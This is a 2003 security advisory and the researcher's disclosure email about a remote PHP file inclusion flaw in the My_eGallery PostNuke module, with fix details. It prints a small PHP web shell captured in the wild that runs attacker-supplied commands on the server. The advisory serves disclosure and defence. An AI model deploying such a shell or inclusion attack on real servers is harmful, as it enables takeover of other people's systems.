My_eGallery Include File Flaw Lets Remote Users Execute Arbitrary Commands
|
|
SecurityTracker Alert ID: 1008312
|
|
CVE Reference: GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Nov 26 2003
|
Impact: Execution of arbitrary code via network, User access via network
|
Fix Available: Yes
Vendor Confirmed: Yes
|
Version(s): prior to 3.1.1.g
|
Description: A vulnerability was reported in the My_eGallery module for PostNuke. A remote user can execute arbitrary commands on the target server with the privileges of the target web daemon.
It is reported that some of the module's PHP files contain include statements that are not properly validated to ensure that the
proper files are included. A remote user can create a specially crafted URL to cause arbitrary PHP code on a remote server to be
included and executed on the target server. The PHP code can include operating system commands.
|
Impact: A remote user can execute arbitrary PHP code and operating system commands on the target server with the privileges of the web server process.
|
Solution: The vendor has released a fixed version (3.1.1.g) and also a hotfix for previous versions, available at:
http://lottasophie.sourceforge.net/modules.php?op=modload&name=Downloads&file=index&req=viewdownload&cid=5
|
Vendor URL: sourceforge.net/project/shownotes.php?release_id=200138 (Links to External Site)
|
Cause: Access control error, Input validation error
|
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
|
Reported By: "Bojan Zdrnja" <Bojan.Zdrnja@LSS.hr>
|
Message History:
None.
|
Source Message Contents
|
Date: Thu, 27 Nov 2003 09:37:36 +1300
From: "Bojan Zdrnja" <Bojan.Zdrnja@LSS.hr>
Subject: Remote execution in My_eGallery
|
Product: My_eGallery
Versions affected: all <3.1.1.g
Website: http://lottasophie.sourceforge.net/index.php
1. Introduction
---------------
My_eGallery is a very nice PostNuke module, which allows users to create and
manipulate their own galleries on the web, plus offers various additional
features.
For more information and a demonstration you can go to the Website above.
2. Exploit
----------
Any version of My_eGallery, prior to 3.1.1.g, is susceptible to this
vulnerability.
Certain php files have some parameters which are used in include functions
not filtered.
An intruder can craft PHP code on their Web site and supply parameter to
My_eGallery so it actually includes malicious PHP code.
The following code was captured as being used in the wild (edited
intentionally):
<?
// CMD - To Execute Command on File Injection Bug ( gif - jpg - txt )
if (isset($chdir)) @chdir($chdir);
ob_start();
execute("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
$output = ob_get_contents();
ob_end_clean();
print_output();
?>
This allows execution of any command on the server with My_eGallery, under
the privileges of the Web server (usually apache or httpd).
3. Solution
-----------
Vendor was contacted and promptly replied. Fix is available at the vendor's
site:
http://lottasophie.sourceforge.net/modules.php?op=modload&name=Downloads&fil
e=index&req=viewdownload&cid=5
As this was seen being exploited in the wild, users are urged to upgrade to
the latest version as soon as possible.
Regards,
Bojan Zdrnja
CISSP
|
|
